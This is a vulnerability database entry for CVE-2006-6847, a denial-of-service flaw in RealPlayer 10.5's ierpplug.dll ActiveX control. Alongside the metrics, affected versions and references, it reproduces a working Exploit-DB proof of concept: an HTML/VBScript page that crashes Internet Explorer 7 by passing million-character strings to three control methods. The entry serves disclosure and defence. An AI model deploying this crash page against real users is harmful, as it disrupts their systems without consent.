CVE-2006-6847 : Detail

6.38%V3
Network
2007-01-03 01h00 +00:00
2017-10-18 12h57 +00:00
CVE Descriptions

An ActiveX control in ierpplug.dll for RealNetworks RealPlayer 10.5 allows remote attackers to cause a denial of service (Internet Explorer 7 crash) by invoking the RealPlayer.OpenURLInPlayerBrowser method with a long second argument.

CVE Information

Metrics

| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 5 | | AV:N/AC:L/Au:N/C:N/I:N/A:P | nvd@nist.gov |

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 3030

Publication date : 2006-12-27 23h00 +00:00
Author : shinnai
EDB Verified : Yes

<pre><code>
-----------------------------------------------------------------------------
 RealPlayer 10.5 ierpplug.dll multiple methods Denial of Service
 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org

 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------

<object classid='clsid:FDC7A535-4070-4B92-A0EA-D9994BCC0DC5' id='RealPlayer'></object>

<select style="width: 404px" name="Pucca">
  <option value = "GetComponentVersion">GetComponentVersion</option>
  <option value = "HandleAction">HandleAction</option>
  <option value = "DoAutoUpdateRequest">DoAutoUpdateRequest</option>
  <option value = "Quoting">Quoting...</option>
</select>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
 Sub tryMe
  on error resume next
  if Pucca.value="GetComponentVersion" then
   argCount = 1
   arg1=String(1000000, "A")
   RealPlayer.GetComponentVersion arg1
  elseif Pucca.value="HandleAction" then
   argCount = 1
   arg1=String(1000000, "A")
   RealPlayer.HandleAction arg1
  elseif Pucca.value = "DoAutoUpdateRequest" then
   argCount = 3
   arg1=1
   arg2=String(1000000, "A")
   arg3=1
   RealPlayer.DoAutoUpdateRequest arg1 ,arg2 ,arg3
  else
   MsgBox "And the beast shall come forth surrounded by a roiling cloud of vengeance." & vbCrLf & _
          "The house of the unbelievers shall be razed and they shall be scorched to the earth." & vbCrLf &_
          "Their tags shall blink until the end of days."
  end if
 End Sub
</script>
</code></pre>

# milw0rm.com [2006-12-28]

Products Mentioned

Configuration 0

Realnetworks>>Realplayer >> Version 10.5

Realnetworks>>Realplayer >> Version 10.5_6.0.12.1016_beta

Realnetworks>>Realplayer >> Version 10.5_6.0.12.1040

Realnetworks>>Realplayer >> Version 10.5_6.0.12.1053

Realnetworks>>Realplayer >> Version 10.5_6.0.12.1056

Realnetworks>>Realplayer >> Version 10.5_6.0.12.1059

Realnetworks>>Realplayer >> Version 10.5_6.0.12.1069

Realnetworks>>Realplayer >> Version 10.5_6.0.12.1235

References

http://www.securityfocus.com/bid/21802
Tags : vdb-entry, x_refsource_BID
https://www.exploit-db.com/exploits/3030
Tags : exploit, x_refsource_EXPLOIT-DB